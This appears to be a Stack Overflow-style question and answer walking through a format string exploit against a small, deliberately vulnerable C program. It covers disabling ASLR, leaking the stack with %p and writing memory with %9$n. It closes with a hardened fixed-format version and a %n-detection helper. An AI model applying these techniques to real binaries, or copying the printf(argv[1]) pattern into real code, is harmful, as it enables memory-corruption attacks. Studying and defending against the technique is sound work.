c - How to use Format String Attack
Assume we have the following code:

```c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int num1 = 0;

int main(int argc, char **argv){
    double num2;
    int *ptr = &num1;
    printf(argv[1]);   /* user input used directly as the format string */
    if (num1 == 2527){
        printf("well done");
    }
    if(num2 == 4.56)
        printf("you format string expert");
    return 0;
}
```
I am trying to understand how to do it right; I can't organize in my mind the guides on the internet.
Is it supposed to be like:

```
./program %p %p %p %p
```

and then

```
./program $( printf "\xaa\xaa\xaa\xaa") %.2523d%n
```

I can't figure it out, please walk me through it.
The main point is to exploit the string running through the program's printf function. I need both "well done" and "you format string expert" printed, in this case through the Linux terminal/shell. hustmphrrr notice: it is indeed supposed to be white hacking - software security

First of all I recommend reading the book Hacking: The Art of Exploitation. It is good.
Now I try to explain how you can exploit the program. I assume you know the basics of format string exploits, so I don't have to start at the beginning. It is important to disable ASLR and compile the executable without stack protection.

```
# disable aslr
@> echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# compile without stack protection
@> gcc -g -fno-stack-protector -z execstack fmt.c
```

I modified the program a little bit, so it is easier to understand how the exploit works:

```c
#include <stdio.h>

int num1 = 0xdead;

int main(int argc, char **argv){
    int num2 = 0xbeef;
    int *ptr = &num1;
    printf(argv[1]);   /* user input used directly as the format string */
    if (num1 == 0xabc){
        printf("well done");
    }
    if(num2 == 0xdef)
        printf("you format string expert");
    /* debug output: current values and addresses of both variables */
    printf("\n[debug] num1: 0x%x [%p] num2: 0x%x [%p]\n", num1, &num1, num2, &num2);
    return 0;
}
```
I am using a 64-bit Ubuntu system, so the pointer size is 8 bytes.

The exploit

Variable num1

First we try to change the variable num1. The address of num1 is stored in ptr. ptr is a local variable in main, so it is put on the stack (type int*). To examine the stack we can use the %p format specifier.

```
@> ./a.out %p.%p.%p.%p.%p.%p.%p.%p.%p
```

Output:

```
0x7fffffffdf78.0x7fffffffdf90.(nil).0x7ffff7dd4e80.0x7ffff7dea560.0x7fffffffdf78.0x200400440.0xbeefffffdf70.0x601040
[debug] num1: 0xdead [0x601040] num2: 0xbeef [0x7fffffffde84]
```
We can see that the 9th element has the value 0x601040. This is the same value as in our debug message num1: 0xdead [0x601040]. So we know that 0x601040, the pointer to the variable num1, is located on the stack. To change the value (write in memory) we can use the %n format specifier in combination with direct parameter access, %9$n, which writes to the address stored in the 9th stack position.

To gain access to the well done message we need to write 0xabc values to stdout and use %n to write the number in memory:

```
@> ./a.out `python -c "print('a' * 0xabc)"`%9\$n
```

I use python to generate the output. The program prints "well done".
Variable num2

If you take a close look at the output you see that the 8th element has the value beef. This is our variable num2. I still did not figure out how to exploit num2, but I try to explain how it works in theory. We want to put an arbitrary memory address on the stack. The address should be the address that points to num2 (0x7fffffffde84). After that we can use the %n parameter to write to the address. To put the address on the stack we can use the format string.

```
@> ./a.out `printf "\x08\x07\x06\x05\x04\x03\x02\x01"`
```

The problem is that we have to find the location of the format string on the stack.

```
@> ./a.out aaaa`printf "\x08\x07\x06\x05\x04\x03\x02\x01"`bbbb`python -c "print('%p.' * 200)"`
```

The 'a's and 'b's are padding, so it is easier to find our address in the output. The exploit looks similar to the num1 exploit in this way:

```
@> ./a.out address`python -c "print('a' * val_to_write)"`padding%location_of_address\$n
```

The problem: in our scenario the address of num2 is 0x7fffffffde84 (that is 0x00007fffffffde84). The address can not be written because 0x00 is the C-string terminator. So we can not put the address in our format string.
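The defensive side of what the answer demonstrates, as an added example that is not code from the question or the answer: the program is exploitable only because argv[1] is the format string itself. Passing the input as an argument to a fixed "%s" format makes %p and %n print literally, and a small audit helper can flag data carrying %n directives before it reaches a format function. The names echoes_literally and count_write_directives are my own for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of printf(argv[1]): the format is a constant and the
 * untrusted string is only data. Returns 1 if the output equals the input
 * byte for byte, i.e. no directive inside the input was interpreted. */
static int echoes_literally(const char *input)
{
    char out[256];
    int n = snprintf(out, sizeof out, "%s", input);   /* fixed format */
    return n >= 0 && (size_t)n < sizeof out && strcmp(out, input) == 0;
}

/* Audit helper (constructed for this example, not a library function):
 * counts %n conversions in a string, including positional forms such as
 * "%9$n" and padded forms such as "%.2523d%n". "%%" is ignored because
 * it is a literal percent sign, not a conversion. */
static int count_write_directives(const char *s)
{
    int count = 0;
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        p++;                                    /* character after '%' */
        if (*p == '%') { p++; continue; }       /* "%%" -> literal '%' */
        /* skip flags, width, precision, positional index and length modifiers */
        while (*p && strchr("0123456789.$-+ #lhzjt", *p))
            p++;
        if (*p == 'n')
            count++;
        if (*p == '\0')
            break;
    }
    return count;
}

int main(void)
{
    /* constructed sample inputs mirroring the ones used in the answer */
    const char *probe = "%p.%p.%p.%p.%p.%p.%p.%p.%p";
    const char *write = "aaaa%9$n";
    printf("probe echoed literally: %d, %%n count: %d\n",
           echoes_literally(probe), count_write_directives(probe));
    printf("write echoed literally: %d, %%n count: %d\n",
           echoes_literally(write), count_write_directives(write));
    return 0;
}
```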